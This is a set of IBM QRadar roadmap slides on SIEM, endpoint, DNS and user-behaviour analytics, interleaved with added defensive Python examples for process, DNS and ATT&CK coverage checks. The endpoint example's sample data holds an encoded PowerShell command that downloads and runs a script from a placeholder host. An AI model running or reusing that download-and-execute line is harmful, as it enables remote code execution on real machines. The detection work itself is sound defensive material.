3. IBM Security – Our Security Intelligence Strategy
Cloud
• Security for the cloud
• QRoC (QRadar on Cloud) and Cloud First
• 3rd Party Cloud Deployment
• Hybrid Services
Customer Success
• Community
• Assistant
• UI Refresh and Microservice
• Open data
Cognitive and Analytics
• Watson Advisor
• User Behavior
• Model based analytics
• Endpoint, Cloud, Network and User focus
4. IBM QRadar Security Intelligence – Security Analytics require an integrated solution set
ABOVE THE SIEM – New Security Operations Tools
• Incident Response Orchestration
• Cognitive Security
• Hunting
• User and Entity Behavior
SIEM LAYER
• Event Correlation and Log Management
BELOW THE SIEM
6. Eco-System, App and Integration Builder
STREAMLINING NEW DATA INGESTION
• Supports simple and easy ingestion and interpretation of new data sources.
APP DEVELOPMENT TOOL
• Real-time QRadar App editing and creation
• Create or edit apps easily
NEW: FREE QRADAR!
• 50 EPS (events per second) and 5K FPM (flows per minute)
• Runs on a laptop
7. QRadar Pulse – New Dashboards (NEW)
• Predefined dashboards to get started before you create one of your own.
• Fine-tune display with complete flexibility in dashboard layout and dashboard item refresh rates.
• Enlarge and pop out dashboard items to display in a multi-screen SOC.
• Create unique dashboards to track endpoint, user, cloud, department, and company-wide security and operational data.
• Stay informed with single-click drill-down to underlying event, network, and alert data.
• Import and export dashboards to share with colleagues.
• Create dashboard items that use the full power of AQL (Ariel Query Language).
8. IBM QRadar Advisor with Watson
Advisor is quick to deploy and easy to consume: delivered via IBM Security App Exchange, downloadable in minutes.
Security Analytics
• Data correlation
• Pattern identification
• Anomaly detection
• Prioritization
• Data visualization
• Workflow
Watson for Cyber Security
• Unstructured analysis
• Natural language
• Question and answer
• Machine learning
• Bias elimination
• Tradeoff analytics
Human Expertise
• Common sense
• Morals
• Compassion
• Abstraction
• Dilemmas
• Generalization
Watson Advisor
• Local mining
• 2nd stage ‘hunt’
• Root cause and impact presentation and graph visualization
9. New Administration and Operations Tools (NEW)
BIRDS-EYE VIEW OF SYSTEM
• EPS, log source health, expensive rules, properties, I/O, memory, notifications/alerts, stored events, and much more
• Deployment-wide and per appliance/node view
FAST INVESTIGATIONS
• Immediate visibility of configuration changes, searches and other actions
• Understand correlation and impact of configuration and data changes on platform activity
• Audit trail of all user actions
10. Deeper Endpoint Threat Detection
• Detected an Unquoted Service Binary Path with Spaces
• Detected a Service Binary Path Changed followed by a User or Group Added
• Unsigned Executable Loaded Into Sensitive System Process
• PowerShell Malicious Usage Detected with Encoded Command
• PowerShell Malicious Usage Detected
• PowerShell Script File Has Been Downloaded
• Process Started from Unusual Directories
• Process Loaded Executable from Temp Directory
• Detected PsExec with a Different Process Name
• Detected a Suspicious Svchost Process
• Detected Excessive Usage of System Tools From a Single Machine
• Shadow Copies Delete Detected
• Detected a Possible Keylogger
• Process Created a Thread Into Another Process
• Process Profiler: Process Name to Hash
• Process Profiler: Process Name to Parent Process
• System Process Started From Unusual Directory
• Abnormal Parent for a System Process
• Abnormal Parent for a Process
• Detected a Known Process Started With Unseen Hash
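A few of the detections named on this slide, written out as plain checks over constructed Sysmon-style process-creation records. This is added example code, not QRadar's rule logic or its event schema: the field names, hashes, file paths and the baseline of "previously seen" hashes are all made up here, and the expected-parent table is the documented Windows process tree.

```python
r"""Illustrative endpoint detections over constructed process-creation records.
Not QRadar's implementation; fields, hashes and paths are invented for the example."""
import base64
import binascii
import re

# Documented Windows process tree: which parent(s) a core system process should have.
EXPECTED_PARENT = {
    "svchost.exe": {"services.exe"},
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "csrss.exe": {"smss.exe"},
}

# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 argument.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
TEMP_DIR = re.compile(r"(?i)[\\/]temp[\\/]")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_unquoted_service_path(image_path: str) -> bool:
    r"""Unquoted Service Binary Path with Spaces: the binary part of an unquoted ImagePath
    contains a space, so the service manager tries C:\Program.exe before
    C:\Program Files\..., which anyone who can write to that prefix can exploit."""
    path = image_path.strip()
    if path.startswith('"'):
        return False
    end = path.lower().find(".exe")
    binary = path if end < 0 else path[: end + 4]
    return " " in binary


def encoded_powershell(cmd: str):
    """Return the decoded payload of a -EncodedCommand invocation, or None if the command
    line does not carry one. PowerShell expects base64 of UTF-16LE text."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return m.group(1)  # the flag alone is the indicator; show the raw argument to the analyst


def evaluate(event: dict, baseline: dict) -> list:
    """Apply the checks to one process-creation event and return the rule names that fire."""
    image, parent = basename(event["image"]), basename(event["parent"])
    fired = []
    if image in EXPECTED_PARENT and parent not in EXPECTED_PARENT[image]:
        fired.append("Abnormal Parent for a System Process")
    # Process profiler (name -> hash): a name with a hash history, now running with a hash never seen.
    if image in baseline and event["hash"] not in baseline[image]:
        fired.append("Detected a Known Process Started With Unseen Hash")
    if image in ("powershell.exe", "pwsh.exe") and encoded_powershell(event["cmd"]) is not None:
        fired.append("PowerShell Malicious Usage Detected with Encoded Command")
    if TEMP_DIR.search(event["image"]):
        fired.append("Process Started from Unusual Directories")
    return fired


def audit_services(image_paths) -> list:
    """Return the service ImagePath values that are unquoted and contain spaces."""
    return [p for p in image_paths if is_unquoted_service_path(p)]


# --- constructed sample data (not real telemetry) ---------------------------------------
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

BASELINE = {"svchost.exe": {"HASH_A"}, "lsass.exe": {"HASH_L"}}  # invented "seen before" hashes

EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "hash": "HASH_A", "cmd": "svchost.exe -k netsvcs"},
    {"id": 2, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "hash": "HASH_Z", "cmd": "svchost.exe"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "hash": "HASH_P",
     "cmd": "powershell.exe -nop -w hidden -enc " + ENC},
    {"id": 4, "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "parent": r"C:\Windows\explorer.exe", "hash": "HASH_T", "cmd": "update.exe /silent"},
]

SERVICE_PATHS = [
    r'"C:\Program Files\Vendor\agent.exe" -svc',
    r"C:\Program Files\Vendor Tools\updater.exe /run",
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]


def run_all(events=EVENTS, baseline=BASELINE) -> dict:
    return {e["id"]: evaluate(e, baseline) for e in events}


if __name__ == "__main__":
    for eid, rules in run_all().items():
        print(eid, rules or "clean")
    print("unquoted service paths:", audit_services(SERVICE_PATHS))
```

The profiler check is deliberately pure (it never adds the new hash to the baseline), so the same event evaluates the same way twice; a production profiler learns after an analyst confirms the new hash is a legitimate update, not automatically.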
11. QRadar Network Insights (NEW)
Announcing NEW IBM QRadar Network Insights (QNI)
• Innovative network analytics solution that will quickly and easily detect insider threats, data exfiltration and malware activity
• Logs and network flow data alone do not provide enough visibility
• Records application activities, captures artifacts, and identifies assets, applications and users participating in network communications
• Configurable analysis of network traffic for real-time threat detection and long-term retrospective analysis
• New appliance with out-of-the-box App on the App Exchange for fast time to value and best practices
12. Defending the DNS Attack Vector
Identification
• A new domain is observed via local DNS queries seen by QNI
• DNS logs or DNS mirrored traffic
New Analytics
• QRadar domain analytics, including DGA detection, tunneling detection, beaconing, IP flux, and whois information
[Chart: hours of visibility for a new domain (x-axis 1 to 50 hours). Conventional threat intelligence: extraction (250+ days), then publish. QRadar DNS-based threat detection: illuminate.]
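Toy versions of three of the domain analytics named above (DGA-looking names, tunneling-shaped query volumes, beaconing intervals), run over constructed DNS query log lines. This is added example code, not QRadar's analytics or its DNS log format; the thresholds are illustrative, the log line layout is invented, and the registered-domain split is a naive last-two-labels rule where a real implementation would use the Public Suffix List.

```python
"""Illustrative DNS analytics over constructed query logs. Not QRadar's code or format."""
import math
import statistics
from collections import Counter, defaultdict


def parse(lines):
    """Each constructed line is '<epoch seconds> <client ip> <qname> <qtype>'."""
    records = []
    for line in lines:
        ts, client, qname, qtype = line.split()
        records.append({"ts": int(ts), "client": client,
                        "qname": qname.lower().rstrip("."), "qtype": qtype})
    return records


def registered_domain(qname: str) -> str:
    # Naive: last two labels. Real code uses the Public Suffix List (co.uk etc.).
    return ".".join(qname.split(".")[-2:])


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def dga_candidates(records, min_len=12, min_entropy=3.5):
    """DGA heuristic: long, high-entropy second-level labels (dictionary DGAs evade this)."""
    hits = set()
    for r in records:
        domain = registered_domain(r["qname"])
        label = domain.split(".")[0]
        if len(label) >= min_len and shannon_entropy(label) >= min_entropy:
            hits.add(domain)
    return sorted(hits)


def tunneling_candidates(records, min_len=40, min_unique=10):
    """Tunneling heuristic: many distinct, unusually long names under one zone
    (data rides in the subdomain labels, so every query is unique and long)."""
    long_names = defaultdict(set)
    for r in records:
        if len(r["qname"]) >= min_len:
            long_names[registered_domain(r["qname"])].add(r["qname"])
    return sorted(d for d, names in long_names.items() if len(names) >= min_unique)


def beaconing_candidates(records, min_queries=6, max_cv=0.1):
    """Beaconing heuristic: one client resolving one zone at near-constant intervals
    (coefficient of variation of the inter-query gaps at or below max_cv)."""
    times = defaultdict(list)
    for r in records:
        times[(r["client"], registered_domain(r["qname"]))].append(r["ts"])
    hits = []
    for key, ts in times.items():
        if len(ts) < min_queries:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            hits.append(key)
    return sorted(hits)


def constructed_log():
    """Made-up traffic: some browsing, one jittered beacon, two DGA lookups, one bursty tunnel."""
    lines = [f"{1000 + 7 * i} 10.0.0.5 {n} A" for i, n in
             enumerate(["www.google.com", "mail.example.com", "cdn.example.com", "www.example.com"])]
    beacon_offsets = [0, 60, 118, 179, 239, 298, 360, 420]          # ~60 s with slight jitter
    lines += [f"{2000 + o} 10.0.0.7 beacon.example.org A" for o in beacon_offsets]
    lines += [f"3000 10.0.0.9 {n} A" for n in ("xk3j9qw2hz7lp4.com", "q8zv1mw0tr5yhn.net")]
    tunnel_offsets = [0, 1, 5, 6, 14, 15, 16, 30, 31, 45, 50, 52]   # bursty, not periodic
    lines += [f"{4000 + o} 10.0.0.11 {i:02d}{'ab3f' * 10}.t.tunnel-example.net TXT"
              for i, o in enumerate(tunnel_offsets)]
    return lines


def analyse(lines=None):
    records = parse(lines if lines is not None else constructed_log())
    return {"dga": dga_candidates(records),
            "tunneling": tunneling_candidates(records),
            "beaconing": beaconing_candidates(records)}


if __name__ == "__main__":
    for kind, hits in analyse().items():
        print(kind, hits)
```

Each heuristic is tuned to miss the others' traffic on purpose: the tunnel zone has a readable second-level label (low entropy), and its bursty timing keeps it out of the beacon list, which is exactly the separation an analyst wants when the three analytics feed different offenses.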
13. Securing the Cloud – Cloud Visibility (Q3 2018)
AWS
• Ingests CloudTrail, CloudWatch, VPC Flow Logs, and S3 bucket log data from AWS
• Best practice threat and risk management
AZURE
• Ingests Azure Event Hub data
• Single view of malicious behaviors and risks
IBM Cloud
• Detect and prevent common misconfigurations; analyze and assess security of cloud deployments
14. QRadar Advisor with Watson – Continued Innovation
• Automated and ad-hoc investigations
• Malware executed indicators, blocked and allowed connections
• Extended threat investigation from Watson Insights
• Automated Watson Insight watchlist integration
• User Behavior Analytics and Asset insights
• Local threat intel
15. QRadar UBA 3.0 (NEW)
STREAMLINED INCIDENT INVESTIGATIONS
• Multiple user watch lists
• New dashboard visuals
• Session-based risk views
• Automated actions including management review
SIMPLIFIED SETUP
• Use Case Wizard
• Streamlined LDAP setup
Additional Use Cases
• Additional ML-based use cases
• Cloud, Source Code, Swift, EPIC
[Screenshots: UBA Dashboard with user role/title, color-coded risk scores and sortable lists for recent and overall risky users; visual timeline chart that shows normal and anomalous user events by time (month/weekday/hour/min); UBA Dashboard with multiple customizable watchlists]
16. QRadar Data Store – Freeing the data (NEW)
Data Store
• Need to store data for reporting, search, investigation, audit, compliance and/or analytics?
• Don’t need correlation, behavior analysis and offenses?
• EPS licensing too expensive?
Free the data
• Collect, parse, normalize and store data
• No data volume license limit per appliance or node
• Unlock the value with Search, Reports, Dashboard and Apps**
• Simple, fixed, low cost per appliance/node licensing
** Excludes UBA, Cloud Discovery
You are in control
• Use existing deployment capacity
• No additional infrastructure mandated
• You define what data goes to the Data Store: IP, CIDR, log source, expression
• Move data to the Threat Detection function (EPS license) when you need to
17. Splunk App for QRadar (NEW)
GET SPLUNK DATA INTO QRADAR EASILY
• Easily utilize existing Splunk collection infrastructure
• Forward logs from universal and heavy forwarders
• All done via the QRadar admin screen for easy configuration
• Fast and simple to deploy and start forwarding logs
  − Pick your data and where you want to send it
19. MITRE ATT&CK coming to QRadar (Q4 FY18)
• Structured approach to, and evaluation of, use case coverage
• New use case recommendation engine*
• Simplified and consistent views of offenses and investigation
• Higher-level analytics on tactic trends and patterns
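What a structured coverage evaluation of this kind looks like when done by hand, as an added example (not IBM's engine or mapping): detection rule names taken from the endpoint and DNS slides above are mapped to MITRE ATT&CK technique IDs, coverage is rolled up per tactic, and tactics with no covering rule are surfaced together with known techniques under them that nothing maps to yet. The technique and tactic IDs are real ATT&CK Enterprise identifiers; the rule-to-technique mapping is this example's own assumption.

```python
"""Hand-built ATT&CK coverage roll-up. The rule-to-technique mapping is assumed, not IBM's."""

TACTICS = {
    "TA0002": "Execution", "TA0003": "Persistence", "TA0004": "Privilege Escalation",
    "TA0005": "Defense Evasion", "TA0006": "Credential Access", "TA0007": "Discovery",
    "TA0008": "Lateral Movement", "TA0009": "Collection", "TA0010": "Exfiltration",
    "TA0011": "Command and Control", "TA0040": "Impact",
}

# Technique -> tactics it is listed under in the ATT&CK Enterprise matrix.
TECHNIQUE_TACTICS = {
    "T1059.001": {"TA0002"},                      # Command and Scripting Interpreter: PowerShell
    "T1569.002": {"TA0002"},                      # System Services: Service Execution (PsExec)
    "T1574.009": {"TA0003", "TA0004", "TA0005"},  # Hijack Execution Flow: Path Interception by Unquoted Path
    "T1036":     {"TA0005"},                      # Masquerading
    "T1055":     {"TA0004", "TA0005"},            # Process Injection
    "T1056.001": {"TA0006", "TA0009"},            # Input Capture: Keylogging
    "T1490":     {"TA0040"},                      # Inhibit System Recovery
    "T1568.002": {"TA0011"},                      # Dynamic Resolution: Domain Generation Algorithms
    "T1071.004": {"TA0011"},                      # Application Layer Protocol: DNS
    "T1048":     {"TA0010"},                      # Exfiltration Over Alternative Protocol
}

# Assumed mapping of the slides' rule names to techniques (illustrative, not IBM's content).
RULE_TECHNIQUES = {
    "Detected an Unquoted Service Binary Path with Spaces": {"T1574.009"},
    "PowerShell Malicious Usage Detected with Encoded Command": {"T1059.001"},
    "Detected PsExec with a Different Process Name": {"T1569.002", "T1036"},
    "Process Created a Thread Into Another Process": {"T1055"},
    "Shadow Copies Delete Detected": {"T1490"},
    "Detected a Possible Keylogger": {"T1056.001"},
    "Detected a Known Process Started With Unseen Hash": {"T1036"},
    "QRadar domain analytics: DGA detection": {"T1568.002"},
    "QRadar domain analytics: tunneling detection": {"T1071.004"},
}


def coverage_by_tactic(rule_techniques=RULE_TECHNIQUES, technique_tactics=TECHNIQUE_TACTICS,
                       tactics=TACTICS):
    """Tactic name -> sorted technique IDs that at least one rule covers."""
    covered = {name: set() for name in tactics.values()}
    for techniques in rule_techniques.values():
        for tech in techniques:
            for ta in technique_tactics[tech]:
                covered[tactics[ta]].add(tech)
    return {name: sorted(techs) for name, techs in covered.items()}


def uncovered_tactics(**kw):
    """Tactics with no covering rule at all: the first thing a recommendation engine should surface."""
    return sorted(name for name, techs in coverage_by_tactic(**kw).items() if not techs)


def recommended_techniques(rule_techniques=RULE_TECHNIQUES, technique_tactics=TECHNIQUE_TACTICS,
                           tactics=TACTICS):
    """For each uncovered tactic, the known techniques under it that no rule maps to yet."""
    mapped = set().union(*rule_techniques.values())
    out = {}
    for name in uncovered_tactics(rule_techniques=rule_techniques,
                                  technique_tactics=technique_tactics, tactics=tactics):
        ta = next(k for k, v in tactics.items() if v == name)
        out[name] = sorted(t for t, tas in technique_tactics.items()
                           if ta in tas and t not in mapped)
    return out


def rules_for_technique(technique, rule_techniques=RULE_TECHNIQUES):
    """Which rules cover one technique; several usually means overlapping use cases to consolidate."""
    return sorted(rule for rule, techs in rule_techniques.items() if technique in techs)


if __name__ == "__main__":
    for tactic, techs in coverage_by_tactic().items():
        print(f"{tactic:22s} {', '.join(techs) or '-'}")
    print("gaps:", recommended_techniques())
```

With this toy rule set the roll-up reports Discovery, Lateral Movement and Exfiltration as uncovered, and T1048 as the one catalogued technique under Exfiltration with no rule, which is the shape of output a use-case recommendation engine would turn into "add content pack X". A mapping is only as honest as its granularity: a rule that fires on one PsExec rename is not coverage of all of Service Execution.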
20. QRadar Assistant (2H 2018)
ENSURE QRADAR DEPLOYMENT IS FULLY OPTIMIZED AND EFFECTIVE
• Easily access useful info, use cases, tech tips, videos, learning academy etc.
• Call home
IDENTIFY NEW AND UPDATED USE CASES
• Analyses the QRadar environment (e.g. data and apps) and recommends new and updated apps and content packs (use cases)
21. QRadar Assistant – Tuning (Q4 2018)
ENSURE QRADAR IS CONFIGURED CORRECTLY
• Network hierarchy, building blocks, server discovery
WIZARD TO HELP TUNING
• Identify top-firing rules
• Analyses selected rules and suggests improvements
22. QRadar Advisor 2.0 (2018 Q4)
• New summary investigation insights
• MITRE ATT&CK chain analysis and visualization
• Root cause and confidence scoring
[Screenshot labels: MITRE ATT&CK analysis; key threat and risk factors; MITRE custom mapping]
23. QRadar Advisor 2.0 (2018 Q4) – Cross-investigation Analytics
• Related offenses and investigations automatically detected
24. QRadar UBA – 2019 – 1H
AUTOMATED INSIGHTS
• Auto asset, user, app and data discovery and classification
• Asset-based user view
• HR/Travel integration for leavers/travelers etc.
• Password vault integration
DEEPER INSIGHTS
• Sentiment analysis
• Leaver prediction
• Training recommendations
Additional Use Cases
• Cloud, Source Code, Swift, EPIC
[Screenshots: UBA Dashboard with user role/title, color-coded risk scores and sortable lists for recent and overall risky users; visual timeline chart that shows normal and anomalous user events by time (month/weekday/hour/min)]
25. Machine Learning App – Enabling custom ML model configs (2H 2019)
• Define your data set
• Select the model
• Define the features
• Action and explore the results!
• Utilizes the machine learning Spark pipeline in UBA and DNS
28. QRadar on and for IaaS Platforms
[Roadmap table. The five platform column headers were graphics and are not recoverable from this text; cells are listed left to right as extracted.]
Deploy QRadar in Cloud: 2H | Available | Q2 2018 | Q2 2018 | 2H 2018
Marketplace: 2H | Q3 2018 | Q3 2018 | Q3 2018 | 2H 2018
App: 2019 IaaS App | Q3 2018 | Q3 2018 | 2019 IaaS App | 2019 IaaS App
DSM: Q1 2018 | Available | Available | Q3 2018 | Q4 2018
Content Packs: 2H | Available | Q1 2018 (Azure Account Config and Access Monitoring; Office 365 Security Content) | 2H 2018 | 2H 2018
29. QRadar ‘Cloud Burst’ (1H 2019)
CLOUD BASED STORAGE
• QRadar to forward data to elastic cloud S3 storage
• Open data format supported by big data technologies and Splunk
• Cost-effective long-term data store
• Fast and simple to deploy
• Secure
• Cloud-based data search
• Open access to data for analytics
• Reduced IT infrastructure and costs
[Diagram: Unified Search and Investigation across IBM Security QRadar on-premise/QRoC, cloud storage and search, and 3rd party]
30. QRadar ‘App Cloud’ (1H 2018)
CLOUD APP DEPLOYMENT
• Simple click-and-deploy of QRadar apps into the cloud
• Simplified provisioning and scaling
• Secure connection to on-prem or QRoC Cloud
• Reduced IT infrastructure and costs
• Hybrid migration path to cloud for on-premise users
[Diagram: unified view across IBM Security QRadar on-premise/QRoC and cloud-based apps]
31. QRadar Roadmap Summary
• Threat Detection Use Cases and Apps across all domains of security operations
• Core architecture evolution to support cloud and next generation data center processes and technologies
• Continued focus on 3rd party integrations and apps
• Improving consumability and supportability
[Diagram labels: COMPLIANCE, HUMAN ERROR, SKILLS GAP, ADVANCED ATTACKS, INNOVATION]